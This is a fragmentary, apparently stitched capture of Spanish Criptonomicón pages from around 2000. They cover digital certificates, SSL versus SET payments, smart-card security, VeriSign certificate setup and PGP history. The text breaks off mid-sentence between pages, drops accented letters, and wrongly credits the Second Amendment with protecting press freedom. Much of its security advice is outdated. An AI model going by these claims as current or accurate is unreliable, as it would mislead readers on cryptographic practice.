VQQIEwlDYXRhbHVueWExDDAKBgNVBAcTA0JjbjEVMBMGA1UEChMMU0VDVVJJVFkg
QkNOMRowGAYDVQQLExFzZWNjaW8gZCdlbXByZXNlczEdMBsGA1UEAxMURGF2aWQg
R3VlcnJlcm8gVmlkYWwxIzAhBgkqhkiG9w0BCQEWFGd1ZXJyZXJvQGdyZWMudXBj
LmVzMB4XDTk4MTExODE1MTUzMVoXDTk5MTExMzE1MTUzMVowZjELMAkGA1UEBhMC
RVMxCTAHBgNVBAgTADEJMAcGA1UEChMAMQkwBwYDVQQLEwAxGDAWBgNVBAMUD0Nh
bHZpbiAmIEhvYmJlczEcMBoGCSqGSIb3DQEJARYNY2FsdmluQGhvYmJlczCBnzAN
BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAnnTeyRpr9P7RBDBYfotRepgj6UWpwqd8
+Pi1mqLqwZlouvfD2AYFG2pHoURcLKbgS2/OAsQGMiA0vhOXOaOqby9Bp7wUyPMM
rZ0JY4r162BbBqYB+xoHssY5SLu3AFZOIG2HP2cLL/SwX3R/kGu0R29WGrXFQlSb
5eMA4k/jFEcCAwEAATANBgkqhkiG9w0BAQQFAANBADsr6f9ISDWrMFzi0YjJKYu8
CbJYgBec5wgKfYpeRqiDO+6E3mLj6lHLkrz625C9zZ8l1EpIY6y4k/ncnM/v/UU=
- -----END CERTIFICATE----Este es un certificado, vlido durante un ao, emitido por la autoridad certificadora
SECURITY ZUTANEZ para el usuario Jaimito cuya clave pblica RSA es:
exponente: 65537
modulo:
11127195552971827497702000105328725497115357432563948646524265
42649114539614030882310105443040321585401884991855044788817550
61645893205889184340440484177173313682979482908132499473623983
65177107544610936519826706567881109010715263259238888910151015
7610404623906744451048525264576885364836810773621503974118471
Todos los datos estn firmados por la AC usando la funcin hash MD5 y su clave
privada RSA.
Una firma digital es el equivalente de la firma convencional, en el sentido de que es un
aadido al final del mensaje conforme se est de acuerdo con lo que all se dice.
Formalmente, una firma digital es una transformacin de un mensaje de forma que
cualquier persona con conocimiento del mensaje y de la clave pblica del firmante
pueda comprobar que dicha transformacin ha sido realizada realmente por el
firmante.
Para verificar que el certificado es correcto deberamos hacernos con el certificado
digital emitido para dicha AC por una segunda AC. Para verificar la veracidad de este
segundo certificado deberamos obtener el certificado digital emitido para segunda AC
por una tercera AC. Como este proceso podra eternizarse, existen las llamadas
autoridades raz que firman sus propios certificados, un ejemplo de autoridad raz es
Verisign.
Aparte de los datos del emisor y del propietario del certificado ste puede contener
informacin referente a las limitaciones que se hayan establecido para su uso: e-mail,
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos51.html (2 of 4) [25/10/2000 02:31:01 p.m.]
www, etc...
Como puede observarse en el certificado del ejemplo, no existe ninguna referencia a
algoritmos de clave secreta. Cuando navegamos con Netscape y recibimos un
certificado de un servidor web 'seguro' aparece la ventana:
New Site Certificate
Here is the Certificate that is being presented:
Certificate for: UPC Signed by: UPC Encryption: Highest Grade
(RC4 with 128-bit secret key)
The signer of the Certificate promises you that the holder of
this Certificate is who they say they are. The encryption level
is an indication of how difficult it would be for someone to
eavesdrop on any information exchanged between you and this web
site.
La informacin ''Encryption: Highest Grade (RC4 with 128-bit secret key)'' no tiene
nada que ver con el certificado presentado por el servidor, slo depende del
navegador utilizado y del servidor, a distinto navegador distinto grado de cifrado.
Aunque desde un punto de vista tcnico cualquiera puede erigirse en AC (slo es
necesario disponer de un par de claves pblica-privada para firmar y verificar la firma,
y todo aquel que desee obtener un certificado las tiene), una AC, adems de emitir
certificados, debera ofrecer los servicios siguientes:
Bsqueda de certificados: Una persona puede querer buscar el certificado
referente a otra persona o entidad.
Revocacin: Si un certificado se pierde, el titular debe poder informar a la AC
para que lo anule y emita otro. Tambin si la clave privada ha quedado
comprometida debe ser posible su revocacin.
Suspensin: La AC debe suspender la validez de un certificado si se hace un
uso anormal de l.
Estado del certificado: Las personas a las que se les presenta un certificado
deben de poder comprobar que no ha sido revocado o suspendido.
Actualmente an se est desarrollando el marco legal que regule el reconocimiento de
la validez legal de las firmas digitales y cules han de ser los requerimientos mnimos
que han de reunir las autoridades certificadoras para ser reconocidas como tales.
Publicado en el Boletn del Criptonomicn #51.
Fernando Martnez es profesor de la asignatura de criptografa del departamento de Matemtica
Aplicada II de la UPC.
Informacin adicional
Firma digital
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes envirselo por
correo electrnico. No tienes ms que indicar la direccin del destinatario, el asunto y tu
nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad, por favor
consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de visitas. Para contribuir al
Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Firma digital
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
una querella de una tienda madrilea contra Banesto por fallos en el pago
electrnico. La noticia deca:
"Los fallos en el pago electrnico a travs del protocolo SSL son
responsabilidad de los medios de pago que, como los que ofrece Banesto,
se ponen a disposicin de las tiendas virtuales". As interpreta Santiago
Ureta, portavoz de Weblisten, que el Juzgado de Instruccin nmero 42 de
Madrid admita la denuncia de esta empresa contra Banesto por estafa y
falsedad documental.
No ser sta la ltima disputa en el terreno del comercio electrnico,
mientras se implanta el nuevo protocolo SET, ms seguro que SSL porque
garantiza mediante certificado que el cliente es quien dice ser."
Hay cuatro requisitos de seguridad en un protocolo de pago: la
confidencialidad (el secreto de las identidades y del pago ante terceros), la
autenticacin (identificacin de los participantes en la transaccin), la
integridad (no modificacin en el trnsito) y el no repudio (ni el emisor ni el
receptor pueden negar haber solicitado un pago o una autorizacin de pago).
La periodista da a entender que SSL y SET sirven para lo mismo. SSL es un
canal que permite la confidencialidad, autenticacin e integridad de las
comunicaciones, pero no asegura el no-repudio. La autenticacin y el no
repudio no son la misma cosa. Autenticar significa identificar el origen de un
mensaje (el que est al otro lado del canal de comunicacin es quin dice
ser). El no-repudio consiste en que ni el emisor ni el receptor puedan negar
su participacin en una transaccin. Para conseguir esto ltimo es preciso
utilizar firmas digitales con claves pblicas certificadas por entidades dignas
de confianza (como hace SET).
Por lo que SSL (por s mismo) no es adecuado utilizarlo en los pagos ya que
ninguna de las partes adquiere compromiso alguno que les obligue a aceptar
la responsabilidad del pago. Es decir, que, por lo que se entiende del artculo
del peridico (no es muy explcito respecto al mecanismo o configuracin
concretos que se han seguido), la irresponsabilidad aparentemente es mutua
porque el banco y la tienda han aceptado un pago no firmado.
SET es un sistema de pago en lnea (on-line): necesita de la autorizacin
expresa del banco realizada mediante una comunicacin con ste a travs
de una entidad intermedia conocida como pasarela (aunque por razones de
eficiencia SET permite al comercio aceptar el pago sin la autorizacin del
banco adems de aceptar varios pagos con una autorizacin previa).
Pero no vayamos a creer que SET es un protocolo genrico de pago, SET
solo puede usarse para pagos con tarjetas de crdito. Por ejemplo no se
pueden intercambiar dinero dos usuarios, firmar contratos entre particulares,
negociacin de precios, etc.
Por lo que dice el artculo, la tienda se dedica a vender canciones en formato
digital (MP3) y ha pasado a utilizar SET para vender las canciones. Pero
SET no es adecuado para pagos de poco valor (micropagos) puesto que no
es lo suficientemente econmico. Un sistema de micropagos eficiente a gran
escala ha de ser autnomo (off-line), es decir que la verificacin de la validez
del dinero venga de la informacin digital que constituye el propio dinero.
Una alternativa a esto (para evitar que se copie y reutilice fcilmente este
dinero virtual) consiste en que la confianza en la existencia de dinero real
que respalde al dinero electrnico resida en la proteccin de un dispositivo
fsico a prueba manipulaciones (como puede ser una tarjeta inteligente).
Es indudable que an se tardar mucho tiempo en que las fabulosas cifras
que se manejan en los estudios de prospectiva financiera se hagan realidad.
Segn mi criterio, se combinan tres tendencias: la picaresca caracterstica
del potencial usuario (sensacin de impunidad de internet), la incapacidad de
manejar adecuadamente todas las posibilidades tcnicas que, ya hoy, la
criptografa pone en nuestras manos y por ltimo, el culto a la imagen
(vendiendo como seguras cosas que no lo son con la nica intencin de
aparentar ser ms modernos que la competencia). Adems est el problema
econmico que representa la inversin en equipos y personal que, hoy por
hoy, es tmida (tarjetas inteligentes, lectores, equipos que accedan a
Internet, contratacin de personal dedicado a seguridad informtica, etc.).
A modo de conclusin opino que se debera dar ms importancia a los
aspectos relacionados con la seguridad, la criptografa y la legislacin
informtica en los planes de estudio de facultades y escuelas de informtica.
La mejor forma de anticipar la generalizacin del comercio electrnico en sus
diversas formas est en minimizar los fraudes que puedan producirse
inicialmente. Por eso los pasos hay que darlos uno a uno. Y lo primero es
formar en serio y en profundidad.
En su momento cost mucho tiempo y esfuerzo que se aceptaran sin
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos50.html (2 of 3) [25/10/2000 02:31:02 p.m.]
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
con la carrera permanente entre el lder del mercado y los competidores que
tratan de alcanzarle - y lo consiguen despus de algn tiempo. Desde el
punto de vista de seguridad, la manera de asegurarte que alguien te atacar
con xito es estar convencido de que nadie puede hacerlo.
Algunas tarjetas son ms susceptibles a los ataques que otras. Hay una
serie de medidas de seguridad perfectamente conocidas que pueden
aadirse a los microprocesadores de las tarjetas "chip" o a las aplicaciones,
pero no siempre son utilizadas o activadas. Los "chips" que han sido
utilizados tradicionalmente en las tarjetas inteligentes fueron diseados en
su origen como microcontroladores incrustados y adems son utilizados in
una amplia variedad de aplicaciones donde la seguridad no es un problema.
De hecho, la seguridad puede ser innecesaria en estas otras aplicaciones,
porque fueron diseadas para entornos de alta fiabilidad. Esto quiere decir
que si algo va mal, el "chip" tratar de solventar el problema y continuar
"haciendo lo que ha sido diseado para hacer". Pero en una tarjeta
inteligente, ese problema puede ser un signo de que un "hacker" est
intentando obtener informacin confidencial de la tarjeta. Lo que
necesitamos de ese "chip" es que "falle" limpiamente con un "reset" o un
bloqueo total, dependiendo del tipo y la gravedad del ataque.
No hay manera de garantizar la seguridad, pero la mejor manera de
asegurarse un nivel alto de seguridad es tener el diseo evaluado y el
producto final probado. Dado que las capacidades de anlisis y prueba
mejoran constantemente, es imposible prever todos los ataques que alguien
pueda imaginar.
Disear con la seguridad en mente agrega complejidad y costo a los "chips".
En algunas aplicaciones de alta seguridad, el riesgo de que alguien pueda
obtener una informacin puede ser lo suficientemente alto como para
necesitar asegurarse de que todas las medidas de seguridad posibles han
sido implantadas. En un mundo ideal las tarjetas de servicios financieros
seran una de estas aplicaciones. Pero la industria financiera es muy
sensible a los costes. Las tarjetas de banda magntica funcionan bastante
bien para su uso actual y, si las tarjetas inteligentes van a sustituirlas en
algn momento, el precio debe ser tan bajo como sea posible. La pregunta
no tiene que ser "Cmo puede ser de segura una tarjeta inteligente?" sino
"Cul es el nivel de seguridad ms rentable para el uso del que van a ser
objeto estas tarjetas?".
En Visa creemos que la seguridad no debera ser un arma competitiva en la
industria de las tarjetas financieras. Todos perderamos si se hiciera pblico
un problema de seguridad importante, independientemente de quin fuera el
emisor o la institucin financiera involucrada. Es una cuestin de credibilidad
y de confianza general, y nuestro objetivo es que todo el mundo sea
consciente de los problemas potenciales de seguridad. Esta es la razn por
la que nos encontramos hoy en esta conferencia.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (2 of 9) [25/10/2000 02:31:03 p.m.]
Objetivos de Seguridad
Hay unas cuantas cosas que todos podemos hacer para asegurar un nivel
adecuado de seguridad. Lo primero es establecer un objetivo de seguridad
apropiado. La seguridad es un problema de ms o menos, no de presente o
ausente. Tenemos que pensar en varios niveles de objetivos o modelos de
seguridad - analizar qu estamos tratando de proteger y cules son las
amenazas potenciales.
La meta debera ser siempre llegar a una situacin en la que el coste o el
esfuerzo del ataque fuera significativamente mayor al beneficio que
comportara si tuviese xito.Si alguien quiere gastar 1.000.000 de Ptas. para
romper una tarjeta desechable de $2.000 Ptas., y esto slo le da acceso a
esa nica tarjeta, la amenaza no es muy grande. Cuanto mayor es el valor
del bien a proteger y ms sencillo el ataque, ms crece la amenaza del
mismo.
Una vez se ha definido el nivel de seguridad requerido, tiene que haber un
proceso de verificacin del mismo. Un principio bsico debera ser que quin
disea un sistema no est capacitado para evaluarlo. Cuando este principio
no se cumple, normalmente nos encontramos con que el "evaluador" se ha
ocupado ms de resaltar las brillantes ideas que tuvo que de encontrar
puntos dbiles.
Validaciones
Hay una variedad de estndares internacionales que algunos pueden pensar
que garantizan la seguridad de las tarjetas inteligentes financieras. Sin
embargo, muchos de ellos, como ISO 7816, se refieren a la funcionalidad de
las tarjetas ms que a su seguridad. No se puede depender nicamente de
estos estndares para garantizar ningn nivel de seguridad en particular.
ITSEC (Information Technology Security Evaluation Criteria) es un sistema
europeo desarrollado para validar aspectos de seguridad en las tecnologas
de la informacin. ITSEC se ocupa de verificar aquello que ha sido declarado
por el fabricante del producto, a travs de laboratorios independientes y
licenciados. Sin embargo, las declaraciones no estn estandarizadas. As, si
un producto tiene una calificacin ITSEC, esto no nos indica por s mismo
que ha sido declarado y validado en su totalidad. La validacin puede
haberse realizado nicamente en una parte del sistema, por ejemplo el
generador de nmeros aleatorios. Aunque tener un buen generador de
nmeros aleatorios es una caracterstica de seguridad importante en un
"chip", esto no nos dice nada acerca de otras caractersticas que pueden
conllevar vulnerabilidades significativas. ITSEC es un paso en la direccin
correcta, pero no es suficiente en s mismo.
Existe asimismo una variedad de estndares de seguridad gubernamentales
en diversos pases, pero no son consistentes entre s. Algunos gobiernos
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
Democrcia.web
Democracies Online
eDemocracy International
Participaci
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Introduccin
Virus
este numero por un Interface a un TPV (Terminal Punto de Venta) como los
que se utilizan en todas las tiendas para cobrar con tarjeta y as se realiza la
transferencia. Aunque se garantiza la confidencialidad de las transmisiones,
aun hay varios puntos muy importantes que SSL no garantiza:
No hay recibos, una reclamacin por parte del cliente quedara a la
buena voluntad del Vendedor.
No hay autentificaron de tarjetas, cualquier persona que tenga acceso
a un numero de una tarjeta de crdito podra realizar una transaccin.
El cliente puede realizar fraudes fcilmente.
El Vendedor obtiene toda la informacin del cliente (numero de tarjeta
de crdito) y podra utilizarla fraudulentamente.
Tienen solucin? Qu se est haciendo para solucionarlos?
En un sistema de comercio electrnico se deberan garantizar las siguientes
caractersticas:
1. Confidencialidad: Ninguna persona ajena a la transaccin debe tener
acceso a los datos financieros. Mas aun, seria importante que el vendedor
tampoco tuviese acceso a esos datos y que el banco no tuviese acceso a los
datos de la venta.
2. Integridad: El sistema debe garantizar que la integridad de los datos
enviados, de no ser as el Vendedor podra aumentar el importe de la
compra posteriormente, por ejemplo.
3. Autenticacin: Todos los participantes deben estar perfectamente
identificados para evitar el principal tipo de fraude: la utilizacin de tarjetas
de crdito robadas.
4. No repudio: El sistema debe generar Recibos que impidan que alguno de
los participantes en la transaccin niegue haber participado en ella.
SSL no garantiza la mayora de estas propiedades. Por este motivo VISA y
MASTERCARD decidieron dar un impulso a la utilizacin de Tarjetas de
Crdito en la compra por Internet creando un nuevo protocolo que tuviese en
cuenta todos estos condicionantes. El protocolo resultante se llama SET
(Secure Electronic Transactions). Este proyecto cuenta con el apoyo de
empresas como: IBM, GTE, Microsoft, Netscape, RSA, Verisign y Verifone
(HP).
SET - Secure Electronic Transactions
En este protocolo se establecen tres entidades independientes: El Cliente, el
Vendedor y la Pasarela de Pago. Todas las comunicaciones entre ambos se
realizan por Internet y se cifran. Antes de realizar cualquier transaccin,
todas las partes deben obtener un Certificado Electrnico que garantice su
Identidad.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos43.html (2 of 4) [25/10/2000 02:31:04 p.m.]
en general.
SET 2.0 es la nueva versin de SET que integrara el uso de Tarjetas
Inteligentes. El principal problema es la necesidad de incorporar un lector de
tarjetas en cada PC. Si se superase este problema tendramos un sistema
realmente robusto de pagos electrnicos.
Publicado en el Boletn del Criptonomicn #43.
Oscar Conesa ha realizando su Proyecto de Fin Carrera en Ingeniera Superior de
Telecomunicaciones, titulado "Seguridad en el Comercio Electrnico por Internet", en el
Dept. de Matematica Aplicada y Telematica de la UPC. Como actividad complementaria a
este proyecto cre una lista de correo sobre el Comercio Electrnico que al poco tiempo
se convirti en la ms importante del mundo hispano sobre este tema gracias a la
participacin activa de muchos expertos espaoles y extranjeros que se dieron de alta en
ella.
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Conocimiento Nulo
Comercio electrnico
Criptologa y seguridad
Conocimiento Nulo
Cuestiones legales
Intimidad y privacidad
Virus
Conocimiento Nulo
Conocimiento Nulo
Informacin adicional
http://www.tcm.hut.fi/Opinnot/Tik-110.501/1995/zeroknowledge.html
Artculos publicados
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
unos CGI diferentes y por tanto es necesario que tu servidor Web pueda o
tenga implementado dicho CGI, puesto que si no lo tiene o no le es rentable
implementarlo te obliga a cambiar de servidor o de entidad financiera.
4) Por otro lado existe la desconfianza de los consumidores en el medio de
pago. Todos estos nuevos medios de pago pueden producir desconfianza en
el pblico, pero estamos hablando de la misma desconfianza que se produjo
cuando se implantaron las tarjetas de crdito y dbito. Actualmente las
tarjetas estn fuertemente arraigadas proporcionando muchos servicios
tanto dentro como fuera de Espaa. Incluso se sabe que tienen limitada su
responsabilidad en caso de prdida o robo, no olvidando que existe una gran
facilidad y rapidez en la anulacin cuando se producen estos hechos. Por
tanto, creo que es un problema de mentalizacin o concienciacin social,
cuya solucin pasa por elaboracin de una estructura financiera capaz de
aportar una gran seguridad en las transacciones electrnicas.
Siendo por tanto la seguridad la clave para la solucin del comercio
electrnico, me gustara diferenciar previamente los tipos de seguridad que
se estn dando hasta el momento. Los sistemas de seguridad que se
implementan actualmente se pueden dividir en dos grupos :
1. Canales seguros de comunicacin. Son aquellos que agrupan un conjunto
de protocolos que garantizan la confidencialidad y la integridad de las
comunicaciones va red. De entre los cuales destacan:
SHTTP (Secure HiperText Transfer Protocol), que da soluciones de
seguridad a las conexiones HTTP.
El Protocolo SSL (Secure Socket Layer), diseado e implementado por
Netscape, que proporciona sesiones de comunicacin cifradas y
autenticacin del servidor.
El Protocolo de Microsoft, (PCT) muy parecido al de su competidor
pero compatible con varios protocolos.
2. Sistemas de claves. Se trata de una de las aplicaciones ms importantes
ya que el usuario puede ejecutar una clave desde cualquier lugar de la red
para as obtener la seguridad en la transaccin. Aqu nos encontraramos
con los sistemas criptogrficos simtricos y asimtricos.
a) Encriptacin simtrica: obliga a los dos interlocutores (emisor y receptor)
del mensaje a utilizar la misma clave para cifrar y descifrar el mismo (como
por ejemplo el criptosistema "DES" desarrollado por IBM, Data Encryption
Standard).
b) Encriptacin asimtrica o criptografa de claves pblicas la cual est
basada en el concepto de pares de claves, de forma tal que cada una de las
claves puede encriptar informacin que slo la otra clave pueda desencriptar
el mensaje. El par de claves se asocia a una sola persona, de forma que la
clave privada solamente es conocida por su propietario (no siendo necesaria
la retencin mental, ya que puede ser incorporada en el microchip de la
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos38.html (2 of 5) [25/10/2000 02:31:05 p.m.]
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Una vez que el software del servidor haya creado los dos ficheros (tus claves, pblica
y privada y el CSR, con la pblica), se te recomienda que realices un copia de
respaldo de ambos en un disquete, que debers almacenar en un lugar fsicamente
seguro. Recuerda: si pierdes tu clave privada, VeriSign no podr recuperarla.
3. Enva la Solicitud de Firma de Certificado a VeriSign
Abre el fichero Solicitud de Firma de Certificado en un editor de texto sencillo como
el bloc de notas (que no aada formato ni caracteres de control, como Word) y
selecciona el texto de la Solicitud, incluyendo las lneas --BEGIN NEW
CERTIFICATE REQUEST-- y --END NEW CERTIFICATE REQUEST--. Copia el
texto seleccionado y pgalo en el formulario de solicitud de VeriSign. Pulsa el botn
de Enviar.
4. Completa la solicitud
Rellena el formulario de solicitud con la informacin requerida acerca de tu
compaa y persona/s de contacto.
El contacto tcnico debe estar autorizado para administrar su servidor web y debe
estar empleado por tu compaa u organizacin. Si accedes a travs de un Proveedor
de Servicio Internet (ISP), el ISP necesita completar el formulario de solicitud en
lnea por ti. Lee el Acuerdo de Servicio de Servidor Seguro y si ests de acuerdo con
las condiciones, pulsa en el botn de Aceptar.
5. La autenticacin tarda algunos das
Mientras VeriSign comprueba los datos, se te enviar un correo incluyendo una
direccin web donde podrs comprobar el estado de tu solicitud, as como un nmero
de identificacin personal (PIN) para ver el estado. Si toda la informacin que
enviaste es correcta, recibirs tu Certificado de Servidor Seguro en unos pocos das.
Para el caso de certificado de prueba, se obvian estos pasos.
6. Instala tu Certificado de Servidor Seguro
Cuando recibas tu Certificado de Servidor Seguro por correo, salva el certificado a
un fichero de texto (incluyendo -----BEGIN CERTIFICATE----- y -----END
CERTIFICATE-----, haz una copia de seguridad y almacnalo en un disquete,
anotando la fecha en que lo recibiste. Guarda el disquete en un lugar fsicamente
seguro.
Para instalar el certificado en tu servidor, sigue las instrucciones que recibiste de
VeriSign cuando te registraste, que te guiarn paso a paso a lo largo del proceso, para
cada tipo de servidor. En caso de duda, consulta el manual de software del servidor.
La prxima vez que arranques el servidor (dependiendo del software), ya podrs
ofrecer comunicaciones seguras a tus visitantes en lnea.
Nota: Procesar pginas con SSL supone una sobrecarga para el servidor que puede
reducir su rendimiento. Por este motivo, te recomiendo que apliques SSL de forma
selectiva slo a aquellas pginas que necesiten cifrado, como las pginas de pago. No
file:///C|/TEMP/criptonomicon/criptonomicon/consejos/instalarssl.html (2 of 3) [25/10/2000 02:31:05 p.m.]
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
D-H).
Curiosamente, el esquema Diffie-Hellman es anterior en el tiempo al RSA,
pero no haba sido usado hasta entonces. Pero eso no acall las suspicacias
de los usuarios, acostumbrados a las claves antiguas. Esas suspicacias
crecieron cuando se supo que las nuevas claves D-H no usaban el algoritmo
de firma MD5, sino el nuevo SHA, creado por la temida/odiada Agencia de
Seguridad Nacional (NSA), la gigantesca agencia USA de espionaje de las
comunicaciones. Ironas de la vida, ahora se sabe que MD5 tiene ciertas
debilidades que, si bien no tiene relevancia prctica sobre la seguridad de
las firmas digitales con dicho algoritmo, s ha puesto nerviosos a muchos;
SHA parece ser un algoritmo mucho ms seguro a ese respecto.
Ese aparente coqueteo con sus antiguos acosadores de la NSA dio pie a
conjeturas no muy favorables. Pero cuando la comunidad de usuarios de
PGP explot fue cuando se comprob que la versin 5.0 gratuita, a
disposicin de millones de usuarios, !no permita la generacin ni la gestin
de claves RSA! Malo es que existan dos tipos de claves, aunque por lo
menos se puede elegir. Pero, de un plumazo, se neg esa posibilidad. O
tragas con Diffie-Hellman, o te quedas en tu vieja versin para DOS. La
intencin de PGP Inc., por supuesto, fue la primera; pero mucha gente opt
por la segunda opcin. A fin de cuentas, la imposibilidad de gestionar claves
RSA dejaba a un usuario PGP 5.0 imposibilitado de comunicarse con un
usuario de PGP 2.6.2/2.6.3i. Ambas versiones eran, en la prctica,
incompatibles. Qu juego es este? Dejar a millones de usuarios de las
versiones clsicas fuera de las nuevas tendencias? !Menuda jugarreta!
Entran los vikingos
Dnde entran aqu los vikingos? Bueno, no es ms que una amistosa
alusin al noruego Stale Schumacher. Este hombre, como muchos otros,
cay en la cuenta de las curiosas reglas norteamericanas sobre la
exportacin. La exportacin de programas de criptografa est prohibida, y
punto. Pero en su afn por proteger la libertad de prensa, los tribunales
dictaminaron que la exportacin del cdigo fuente escrito en papel est
protegido por la Segunda Enmienda y, en consecuencia, no se puede
prohibir. Es decir, t no puedes descargar el programa desde un servidor
norteamericano; pero s puedes viajar all, comprar una copia del cdigo
fuente, metrtela en tu bolsa de viaje y volverte tranquilamente a casa.
Lcito, legtimo y legal, aunque parezca digno de una pelcula de los
hermanos Marx.
Y adems, dos huevos duros. Schumacher vio en eso una manera infalible
de exportar el programa fuera de EEUU legalmente. Hasta entonces, las
